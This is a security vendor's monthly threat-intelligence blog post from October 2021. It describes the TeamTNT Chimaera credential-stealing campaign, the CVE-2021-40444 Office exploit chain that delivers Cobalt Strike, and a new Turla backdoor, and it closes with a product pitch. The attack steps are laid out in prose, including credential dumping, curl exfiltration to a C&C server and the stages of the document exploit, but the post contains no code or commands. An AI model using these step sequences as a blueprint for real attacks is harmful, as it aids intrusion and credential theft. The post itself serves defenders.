Cymulate’s September 2021 Cyberattacks Wrap-up

By: Eyal Aharoni, October 4, 2021

Cymulate’s September 2021 Cyberattacks Wrap-up

Threat actors stepped up their game during September 2021. For starters, the Nobelium threat actor group launched its FoggyWeb malware designed to exfiltrate credentials and introduce a permanent backdoor into Active Directory servers. Threat actors also launched TangleBot malware to gain access for spying, data-harvesting, stalking, and fraud attacks. Threat actors also upped their phishing game using deep-sea phishing in their attacks. Deep-sea phishing combines phishing, spear-phishing, and whaling to launch more aggressive attack campaigns. Ransomware, such as Ryuk, and worm-like capabilities were used in the campaigns to make them more effective.

 

TeamTNT and Lazagne Threat

During September, the threat group TeamTNT was active gain, this time targeting multiple operating systems and applications. Operating since the middle of 2020, TeamTNT has been responsible for thousands of infections globally. The group’s trademark is the use of open-source tools such as Masscan and port scanner to detect new infection targets, libprocesshider to execute its bot directly from memory, 7z to decompress downloaded files, b374k shell to control infected systems, and Lazagne to collect stored credentials from numerous applications. This time, TeamTNT used multiple shell/batch scripts, new open-source tools, a cryptocurrency miner, and its TeamTNT IRC bot for its attack campaign. The new open-source tools were designed to steal usernames and passwords from the infected machines. The threat actors targeted operating systems such as Windows, Linux distributions including, Alpine, AWS, Docker, and Kubernetes. The attacks, dubbed the Chimaera campaign, had low to zero detection.

  • The Lazagne credentials stealer first modified the bash history file to hide future executed commands by users with the “history” command on Linux.
  • It then installs its ‘curl’, ‘bash’, ‘wget’, ‘pip’, ‘py3-pip’, ‘python3-pip’ to launch the malware
  • The malware then downloaded another bash script (‘run.sh’) along with the open-source Lazagne project available for different operating systems such as Windows, Linux, and MacOS from its C&C.
  • This second malicious script executed the Lazagne tool and saved its output into “laZagne.out.txt”.
  • It then uploaded it to the C&C using the curl command.
  • After it finished this execution, the malware deleted all its downloaded files.

 

Office and Windows Exploit Continues

This month, Windows CVE-2021-40444 zero-day vulnerability still posed a danger despite Microsoft Office's 'Protected View' feature to block the exploit. The vulnerability enabled threat actors to take over corporate networks by using malicious ActiveX controls to exploit Office 365 and Office 2019 on Windows 10 for downloading and installing malware on the compromised machines. Although the "Protected View" feature mitigated the exploit, many users tended to ignore this warning and clicked on the 'Enable Editing' button. Furthermore, if documents in a container were not MotW-aware, there was no Protected View to block arbitrary code execution by opening an Office document. RTF files do not have Protected View, which makes them especially vulnerable. This vulnerability was abused by threat actors using phishing attacks.

  1. An email was sent claiming to be from an attorney “Letter before court 4.docx”'.
  2. The file was tagged with the 'Mark of the Web' and opened in Protected View.
  3. Once the 'Enable Editing' button was clicked, the exploit opened a URL using the 'mhtml' protocol.
  4. A 'side.html' file hosted at a remote site loaded as a Word template.
  5. A malicious ActiveX control was created by the obfuscated JavaScript code to exploit the CVE-2021-40444 vulnerability.
  6. The ActiveX control also downloaded a ministry.cab file from a remote site and extracted a championship.inf [DLL] file.
  7. The file was then executed as a Control Panel 'CPL' file.
  8. The ultimate payload installed a Cobalt Strike beacon for the threat actors to gain remote access to the infected machine.
  9. The infection then spread laterally throughout the network, installing more malware.
  10. The threat actors were then able to steal files or deploy ransomware.

 

Turla APT's New Malware

Also, in September, we saw that the Turla APT group stepped up its game with new malware to keep a secret backdoor on victim machines. The Russian-based Turla group has been active for almost two decades and have compromised organizations in over 45 countries in a wide range of industries, including government, embassies, military, education, research, and pharmaceutical sectors. This backdoor was used as a second-chance backdoor to maintain access to the compromised system also to use it as a second-stage dropper to infect the system with additional malware.

  • Turla APT installed the Backdoor-as-a-Service on the infected machines.
  • Then used a .bat file to install the backdoor. It was named "Windows Time Service" to resemble a legitimate Windows service.
  • The backdoor uploaded, executed files, and exfiltrated files on and from the compromised systems.
  • The malware contacted to the C&C server via an HTTPS encrypted channel every five seconds to check if there were new commands from the operator.

--

To find out if your organization is protected against the latest malware attacks, run Cymulate's Immediate Threat Assessment. This allows you to test and verify by yourself if your organization is exposed to these attacks. It also offers suggestions for mitigations in case it turns out that your organization is indeed vulnerable. Also, IOCs are available at the Cymulate UI!

Stay cybersafe!

Start a Free Trial

Eyal Aharoni
Eyal Aharoni

Eyal is the VP of Customer Success at Cymulate. During the last 15 years Eyal performed in a number of critical roles in the information and cyber security fields, providing services for global organizations in a wide range of sectors.